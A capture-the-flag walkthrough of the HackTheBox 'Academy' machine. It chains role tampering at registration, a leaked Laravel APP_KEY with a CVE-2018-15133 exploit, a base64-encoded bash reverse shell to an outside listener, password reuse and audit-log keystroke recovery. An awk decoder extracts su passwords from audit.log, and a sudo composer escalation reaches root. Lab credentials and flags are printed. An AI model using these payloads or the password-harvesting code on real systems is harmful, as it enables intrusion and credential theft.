Service overview

The machine has the IP address 10.10.10.215. Let's look at the nmap output (full TCP port range, SYN scan):

$ sudo nmap -sS -Pn -p1-65535 -v -oN 10.10.10.215 10.10.10.215
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 05:46 EDT
Initiating Parallel DNS resolution of 1 host. at 05:46
Completed Parallel DNS resolution of 1 host. at 05:46, 0.24s elapsed
Initiating SYN Stealth Scan at 05:46
Scanning 10.10.10.215 [65535 ports]
Discovered open port 80/tcp on 10.10.10.215
Discovered open port 22/tcp on 10.10.10.215
Discovered open port 33060/tcp on 10.10.10.215
Completed SYN Stealth Scan at 05:59, 745.48s elapsed (65535 total ports)
Nmap scan report for 10.10.10.215
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 746.02 seconds
           Raw packets sent: 68384 (3.009MB) | Rcvd: 70328 (3.226MB)

Web interface

The web server redirects to academy.htb, so add that domain to /etc/hosts:

$ sudo nano /etc/hosts
10.10.10.215 academy.htb

The landing page looks like this:

[screenshot: academy.htb landing page]

Register an account and log in. The dashboard looks like this:

[screenshot: logged-in dashboard]

Note that the application runs on PHP, so let's brute-force files and directories with gobuster and the php extension added:

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://academy.htb -t 20 -x php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://academy.htb
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/07/29 06:04:45 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/home.php             (Status: 302) [Size: 55034] [--> login.php]
/login.php            (Status: 200) [Size: 2627]
/register.php         (Status: 200) [Size: 3003]
/index.php            (Status: 200) [Size: 2117]
/admin.php            (Status: 200) [Size: 2633]
/images               (Status: 301) [Size: 311] [--> http://academy.htb/images/]
/config.php           (Status: 200) [Size: 0]

If we open the admin panel at /admin.php, our freshly registered user cannot log in.

[screenshot: admin login refused]

Try registering again and notice that the registration form submits a field roleid = 0.

[screenshot: registration request with roleid=0]

Register another user, this time with roleid = 1. This user can log into the admin panel: the role is taken straight from the registration request instead of being assigned server-side, so any visitor can make themselves an admin.

[screenshot: admin panel]

From this page we learn about a new host, dev-staging-01.academy.htb. Add it to /etc/hosts as well.

That host shows an error page which dumps the environment variables:

[screenshot: Laravel error page with environment dump]

The application runs on Laravel. The APP_KEY is also exposed in clear text:

[screenshot: APP_KEY in the environment dump]

This means we can use an exploit for CVE-2018-15133 (Laravel deserialization RCE via the X-XSRF-TOKEN header, which needs the APP_KEY to sign the payload): https://github.com/aljavier/exploit_laravel_cve-2018-15133.

$ git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133
$ cd exploit_laravel_cve-2018-15133
$ python3 -m venv env
$ source env/bin/activate
$ pip install -r requirements.txt
$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= 

Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

The exploit works. Now let's prepare a reverse shell:

$ echo 'bash -i >& /dev/tcp/10.10.16.93/4242 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi45My80MjQyIDA+JjEK
# start the listener
$ rlwrap nc -lnvp 4242
# trigger the reverse shell through the exploit
$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi45My80MjQyIDA+JjEK | base64 -d | bash"

[screenshot: reverse shell received]

Getting a user shell

In the web root we find the MySQL credentials.

$ cd /var/www/html/academy
$ cat .env
...
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...

Logging into MySQL with this password does not work. Let's look for the flag file instead, to see which user owns it:

$ cd /home
$ find . -name user.txt
find: './egre55/.cache': Permission denied
find: './cry0l1t3/.cache': Permission denied
find: './cry0l1t3/.gnupg': Permission denied
./cry0l1t3/user.txt
find: './cry0l1t3/snap/lxd/14804/.config/lxc': Permission denied
find: './cry0l1t3/.local/share': Permission denied

Let's try the password mySup3rP4s5w0rd!! for cry0l1t3, the user who owns user.txt (password reuse between the database and a shell account):

$ ssh cry0l1t3@10.10.10.215
mySup3rP4s5w0rd!!

User flag

$ ls -l
total 12
-rw-rw-r-- 1 cry0l1t3 cry0l1t3 1561 Jul 28 08:16 README.md
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Jul 28 08:23 snap
-r--r----- 1 cry0l1t3 cry0l1t3   33 Jul 28 06:23 user.txt
$ id     
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ cat user.txt
10e280bef507b9aa2c7b80151aca261b


Privilege escalation

Note that cry0l1t3 is a member of the adm group, which on this box is enough to read the logs under /var/log, including /var/log/audit/audit.log. With aureport we can see what was typed on the terminals (the keystrokes recorded by pam_tty_audit, see https://access.redhat.com/solutions/5585231):

$ aureport --tty

TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
6. 08/12/2020 02:30:43 94 0 ? 1 nano <delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
7. 08/12/2020 02:32:13 95 0 ? 1 nano <down>,<up>,<up>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<backspace>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
8. 08/12/2020 02:32:55 96 0 ? 1 nano "6",<^X>,"y",<ret>
9. 08/12/2020 02:33:26 97 0 ? 1 bash "ca",<up>,<up>,<up>,<backspace>,<backspace>,"cat au",<tab>,"| grep data=",<ret>,"cat au",<tab>,"| cut -f11 -d\" \"",<ret>,<up>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<right>,<right>,"grep data= | ",<ret>,<up>," > /tmp/data.txt",<ret>,"id",<ret>,"cd /tmp",<ret>,"ls",<ret>,"nano d",<tab>,<ret>,"cat d",<tab>," | xx",<tab>,"-r -p",<ret>,"ma",<backspace>,<backspace>,<backspace>,"nano d",<tab>,<ret>,"cat dat",<tab>," | xxd -r p",<ret>,<up>,<left>,"-",<ret>,"cat /var/log/au",<tab>,"t",<tab>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,"d",<tab>,"aud",<tab>,"| grep data=",<ret>,<up>,<up>,<up>,<up>,<up>,<down>,<ret>,<up>,<up>,<up>,<ret>,<up>,<up>,<up>,<ret>,"exit",<backspace>,<backspace>,<backspace>,<backspace>,"history",<ret>,"exit",<ret>
10. 08/12/2020 02:33:26 98 0 ? 1 sh "exit",<nl>
11. 08/12/2020 02:33:30 107 0 ? 1 sh "/bin/bash -i",<nl>
12. 08/12/2020 02:33:36 108 0 ? 1 bash "istory",<ret>,"history",<ret>,"exit",<ret>
13. 08/12/2020 02:33:36 109 0 ? 1 sh "exit",<nl>

The "Error opening config file" line only means that /etc/audit/auditd.conf is not readable by us; aureport falls back to the built-in log path and the report is still complete. Entry 2 is what was typed into su's password prompt: pam_tty_audit records keystrokes whether or not the terminal echoes them, so the password landed in the audit log in clear. That gives us the credentials mrb3n:mrb3n_Ac@d3my!.
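The TTY report above is just a rendering of the raw type=TTY records in /var/log/audit/audit.log: pam_tty_audit stores every keystroke of an audited session as hex in the data= field, including input at a password prompt. The following is an added example of my own, not part of the write-up: a POSIX shell/awk decoder for those records that reproduces the aureport column layout, plus a helper that pulls out everything typed into su, which is the check a defender would run to find passwords sitting in the audit trail. The four log lines embedded in it are constructed for the example (event ids, pids and timestamps are invented); only the comm/keystroke sequence mirrors the su and whoami entries in the report.

```shell
#!/bin/sh
# Added example (not from the original write-up): decode pam_tty_audit keystroke records
# straight from audit.log, i.e. what "aureport --tty" renders. Works without aureport and
# doubles as a triage check for credentials that ended up in the audit trail.
# The sample records below are constructed; ids, pids and timestamps are invented.
sample_log() {
  cat <<'EOF'
type=TTY msg=audit(1597199290.000:83): tty pid=2516 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.000:84): tty pid=2517 uid=1001 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=USER_AUTH msg=audit(1597199293.500:85): pid=2517 uid=1001 auid=0 ses=1 msg='op=PAM:authentication acct="mrb3n" exe="/usr/bin/su" hostname=? addr=? terminal=/dev/tty1 res=success'
type=TTY msg=audit(1597199304.000:89): tty pid=2520 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
EOF
}

# tty_keystrokes: stdin = audit.log, stdout = "<event-id> <comm> <keystrokes>" per TTY record.
# data= is hex; 0x0a is rendered as <nl> like aureport does, other control bytes as <hh>.
tty_keystrokes() {
  awk '
    $1 == "type=TTY" {
      ev = $0;   sub(/.*msg=audit\([0-9.]*:/, "", ev); sub(/\).*/, "", ev)
      comm = $0; sub(/.*comm="/, "", comm);            sub(/".*/, "", comm)
      data = $0; sub(/.*data=/, "", data);             sub(/[^0-9A-Fa-f].*/, "", data)
      h = tolower(data); out = ""
      for (i = 1; i < length(h); i += 2) {
        b = (index("0123456789abcdef", substr(h, i, 1)) - 1) * 16 + index("0123456789abcdef", substr(h, i + 1, 1)) - 1
        if (b == 10)                out = out "<nl>"
        else if (b < 32 || b > 126) out = out sprintf("<%02x>", b)
        else                        out = out sprintf("%c", b)
      }
      print ev, comm, out
    }'
}

# su_input: everything typed while "su" owned the terminal, i.e. its password prompt.
# pam_tty_audit logs keystrokes regardless of echo, so this is exactly where passwords leak.
su_input() { tty_keystrokes | awk '$2 == "su" { sub(/^[^ ]* [^ ]* /, ""); print }'; }
```

Run `tty_keystrokes < /var/log/audit/audit.log` as a user who can read the file, or `su_input < /var/log/audit/audit.log` to list only what went into su. The non-TTY USER_AUTH record in the sample is skipped, which is the point: the password is not in the authentication event, it is in the keystroke record that precedes it.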

$ ssh mrb3n@10.10.10.215
mrb3n_Ac@d3my!
mrb3n@academy:~$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

User mrb3n is allowed to run /usr/bin/composer as root via sudo.

$ sudo -l
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Using the GTFOBins recipe for composer we escalate to root: a script defined in composer.json runs with the privileges of the invoking user, which under sudo is root:

mrb3n@academy:~$ TF=$(mktemp -d)
mrb3n@academy:~$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:~$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
$ id
uid=0(root) gid=0(root) groups=0(root)

Root flag

$ cd /root
$ ls -la
total 68
drwx------  7 root root  4096 Feb  9  2021 .
drwxr-xr-x 20 root root  4096 Feb 10  2021 ..
-r--r-----  1 root root  1748 Nov  6  2020 academy.txt
lrwxrwxrwx  1 root root     9 Aug 10  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
drwx------  2 root root  4096 Aug  8  2020 .cache
drwxr-xr-x  3 root root  4096 Aug  8  2020 .composer
drwxr-xr-x  3 root root  4096 Aug  7  2020 .local
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
-r--r-----  1 root root    33 Jul 28 06:23 root.txt
-rw-r--r--  1 root root    66 Aug 12  2020 .selected_editor
drwxr-xr-x  3 root root  4096 Aug  7  2020 snap
drwx------  2 root root  4096 Aug  7  2020 .ssh
-rw-------  1 root root 14087 Feb  9  2021 .viminfo
-rw-r--r--  1 root root   186 Sep 14  2020 .wget-hsts
$ cat root.txt
30cc72fe57eaa9daa5138867bf414cc1
